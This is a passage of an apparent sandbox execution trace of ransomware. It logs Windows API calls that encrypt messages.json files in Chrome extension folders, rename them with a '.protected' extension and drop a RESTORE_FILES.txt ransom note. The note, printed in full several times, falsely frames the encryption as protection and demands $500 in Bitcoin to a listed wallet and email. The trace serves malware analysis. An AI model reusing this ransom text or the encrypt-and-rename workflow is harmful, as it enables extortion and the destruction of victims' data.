out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.209] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.209] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.209] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.209] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.209] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.209] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.209] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd4, lpOverlapped=0x0) returned 1 [0080.210] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.210] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd4, lpOverlapped=0x0) returned 1 [0080.210] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.210] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.210] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.210] CloseHandle (hObject=0x168) returned 1 [0080.211] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.protected") returned 168 [0080.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0080.211] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.211] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.211] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 162 [0080.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0080.211] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.211] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.212] lstrlenA (lpString="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") returned 684 [0080.212] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0080.212] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.212] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.212] CloseHandle (hObject=0x164) returned 1 [0080.212] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.212] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0080.212] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0080.212] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0080.212] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0080.212] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0080.212] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW") returned 144 [0080.213] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0080.213] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0080.213] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\*") returned 146 [0080.213] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0080.213] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.213] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.213] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.213] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.213] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.213] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\.") returned 146 [0080.213] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.213] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.213] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.213] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.213] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.213] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.213] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.213] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\..") returned 147 [0080.213] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.213] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.213] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.213] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.213] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.213] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.213] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.213] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.213] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.213] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.213] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.213] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.214] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.214] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.214] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.214] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.214] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd4, lpOverlapped=0x0) returned 1 [0080.215] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.215] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd4, lpOverlapped=0x0) returned 1 [0080.215] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.215] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.215] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.215] CloseHandle (hObject=0x168) returned 1 [0080.215] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.protected") returned 168 [0080.215] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0080.216] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.216] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.216] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 162 [0080.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0080.216] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.216] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.217] lstrlenA (lpString="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") returned 684 [0080.217] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0080.217] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.217] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.217] CloseHandle (hObject=0x164) returned 1 [0080.217] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.217] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.217] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\RESTORE_FILES.txt") returned 156 [0080.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.217] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.217] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.218] lstrlenA (lpString="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") returned 684 [0080.218] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 
[0080.218] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.218] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0080.218] CloseHandle (hObject=0x160) returned 1 [0080.219] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.219] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0080.219] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0080.219] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0080.219] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0080.219] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0080.219] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata") returned 139 [0080.219] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0080.219] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0080.219] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\*") returned 141 [0080.219] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 
0x47bbd0 [0080.219] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.219] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.219] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.219] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.219] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.219] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\.") returned 141 [0080.219] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.219] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.219] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.219] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.219] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.219] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.219] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.219] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\..") returned 142 [0080.219] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.219] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.219] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.219] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Windows") returned -1 [0080.219] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files") returned -1 [0080.220] lstrcmpiW (lpString1="computed_hashes.json", 
